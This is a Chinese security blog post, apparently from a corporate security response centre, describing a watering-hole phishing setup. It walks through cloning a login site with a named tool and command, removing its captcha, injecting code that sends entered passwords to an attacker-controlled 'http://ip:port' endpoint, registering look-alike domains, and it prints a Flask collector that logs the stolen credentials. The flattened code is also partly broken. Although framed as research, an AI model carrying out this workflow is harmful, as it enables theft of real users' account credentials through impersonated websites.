酷应用

水坑钓鱼研究

百家作者：平安安全应急响应中心 2022-08-17 23:37:55

>>>> 0x01 背景介绍

水坑攻击属于APT攻击的⼀种，与钓鱼攻击相比，黑客无需耗费精力制作钓鱼网站，而是利用合法网站的弱点，隐蔽性比较强。在人们安全意识不断加强的今天，黑客处心积虑地制作钓鱼网站却被有心人轻易识破，而水坑攻击则利用被攻击者对网站的信任。

水坑攻击利用网站的弱点在其中植入攻击代码，攻击代码利用浏览器的缺陷，被攻击者访问网站时终端会被植入恶意程序或者被盗取个人重要信息。

>>>> 0x02 准备工作

水坑钓鱼获取账户密码，主要伪造合法网站，植入恶意代码窃取个人重要信息。

寻找目标站点，克隆网站；
网站植入恶意代码用于窃取账户密码；
仿冒相似的域名/高可信过期域名抢注；
隐藏真实站点服务器；

>>>> 0x03 研究细节

（1）寻找目标站点，克隆网站

网站克隆工具：https://github.com/Threezh1/SiteCopy
克隆目标站点：abc.test.com 某站点

可进行 python sitecopy.py -u "http://www.threezh1.com" -e 克隆整改站点，所有js等前端文件都会克隆下载下来。

默认站点代码会在website/克隆站点域名/目录下，如下图：

克隆下Web代码启动Web后，需要根据实际情况进行调整，例如启动会默认某些js无法正常克隆下来报错，根据实际情况进行获取放在相应的目录文件夹下。

原始站点，如下图：

实际需要调整为无验证码等所需账户密码输入的登录框，目标如下：

找到登录框代码所在（不同前端查找方式不⼀样，但是通常都是关键字查找login等），然后进行调试查找验证码功能，修改提示信息，内容如下：

appxxx.js文件

对应chunkxxx.js文件修改

（2）网站植入恶意代码用于窃取账户密码

克隆站点页面显示调整完毕，需要找到“登录”触发点，尝试植入恶意代码获取所需账户密码，植入后台接口"http://ip:port/xxx"，用户获取账户密码，如下图：

简单可以利用flask执着⼀个获取账户密码的接口，如下：

from flask import Flask,request,jsonify,make_responseimport jsonfrom flask_cors import CORSimport timeimport datetimeapp = Flask(__name__)CORS(app, resources=r'/*') t=datetime.datetime.now()#f=open('/root/script/access.log','rw')@app.route('/',methods=['GET','POST'])def hello():     if request.method== 'POST':     print("ok")     data=request.get_json(force=True)     print(data)     t1 =t.strftime('%Y-%m-%d %H:%M:%S')     #t1=time.mktime(time.strptime(t,'%Y-%m-%d %H:%M:%S'))     f1=open('/root/script/access.log','a')     f1.write(t1+":"+str(data)+"\r\n"     f1.close()     return dataif __name__ == '__main__':   app.config['JSON_AS_ASCII'] = False   app.run(host='0.0.0.0',port=8081)